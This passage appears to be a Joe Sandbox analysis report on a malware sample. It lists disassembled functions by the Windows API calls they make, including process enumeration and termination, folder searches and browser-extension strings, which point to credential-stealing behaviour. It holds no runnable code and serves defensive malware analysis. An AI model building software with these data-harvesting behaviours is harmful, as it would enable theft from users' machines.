                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                  • API String ID: 998311485-3310892237
                                                  APIs
                                                  • memset.MSVCRT ref: 02F19752
                                                    • Part of subcall function 02F18FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02F19785,00000000), ref: 02F18FC2
                                                    • Part of subcall function 02F18FB7: RtlAllocateHeap.NTDLL(00000000), ref: 02F18FC9
                                                    • Part of subcall function 02F18FB7: wsprintfW.USER32 ref: 02F18FDF
                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 02F19812
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 02F19830
                                                  • CloseHandle.KERNEL32(00000000), ref: 02F1983D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                  • String ID:
                                                  • API String ID: 3729781310-0
                                                  APIs
                                                  • memset.MSVCRT ref: 004194EB
                                                    • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                    • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                    • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                  • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                  • String ID:
                                                  • API String ID: 396451647-0
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 02F18931
                                                  • Process32First.KERNEL32(?,00000128), ref: 02F18945
                                                  • Process32Next.KERNEL32(?,00000128), ref: 02F1895A
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • CloseHandle.KERNEL32(?), ref: 02F189C8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 1066202413-0
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                  • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                  • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • CloseHandle.KERNEL32(?), ref: 00418761
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 1066202413-0
                                                  APIs
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                  • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                  • lstrcatA.KERNEL32(?,02D45960), ref: 00414FAB
                                                  • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                  • String ID:
                                                  • API String ID: 2667927680-0
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                  • wsprintfA.USER32 ref: 00418850
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Similarity
                                                  • API ID: Heap$AllocProcesslstrcpywsprintf
                                                  • String ID: %dx%d
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Similarity
                                                  • API ID: ExitProcessstrtok_s
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 02F17C17
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F17C1E
                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 02F17C2B
                                                  • wsprintfA.USER32 ref: 02F17C5A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Similarity
                                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                  • wsprintfA.USER32 ref: 004179F3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 02F17CCA
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F17CD1
                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 02F17CE4
                                                  • wsprintfA.USER32 ref: 02F17D1E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Similarity
                                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Similarity
                                                  • API ID: strtok_s
                                                  APIs
                                                  • CreateFileA.KERNEL32(02F13D55,80000000,00000003,00000000,00000003,00000080,00000000,?,02F13D55,?), ref: 02F19563
                                                  • GetFileSizeEx.KERNEL32(000000FF,02F13D55), ref: 02F19580
                                                  • CloseHandle.KERNEL32(000000FF), ref: 02F1958E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSize
                                                  APIs
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02F16D31
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F16D4F
                                                  • CloseHandle.KERNEL32(00000000), ref: 02F16D60
                                                  • Sleep.KERNEL32(00001770), ref: 02F16D6B
                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02F16D81
                                                  • ExitProcess.KERNEL32 ref: 02F16D89
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Similarity
                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • String ID: `o@
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: SystemTimelstrcpy
                                                  • String ID: cI@$cI@
                                                  APIs
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                  • lstrcatA.KERNEL32(?,02D49638), ref: 004150A8
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                  • String ID: aA
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02F0A094
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0BF06
                                                    • Part of subcall function 02F19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02F190B9
                                                  • StrStrA.SHLWAPI(00000000,004213E0), ref: 02F0BF34
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0C00C
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0C020
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                  APIs
                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Find$CloseFileNextlstrcat
                                                  • String ID: !=A
                                                  APIs
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F151E1
                                                  • lstrcat.KERNEL32(?,00421070), ref: 02F151FE
                                                  • lstrcat.KERNEL32(?,0064A5F8), ref: 02F15212
                                                  • lstrcat.KERNEL32(?,00421074), ref: 02F15224
                                                    • Part of subcall function 02F14B77: wsprintfA.USER32 ref: 02F14B93
                                                    • Part of subcall function 02F14B77: FindFirstFileA.KERNEL32(?,?), ref: 02F14BAA
                                                    • Part of subcall function 02F14B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02F14BD8
                                                    • Part of subcall function 02F14B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02F14BEE
                                                    • Part of subcall function 02F14B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02F14DE4
                                                    • Part of subcall function 02F14B77: FindClose.KERNEL32(000000FF), ref: 02F14DF9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Similarity
                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Similarity
                                                  • API ID: lstrcpynlstrlenwsprintf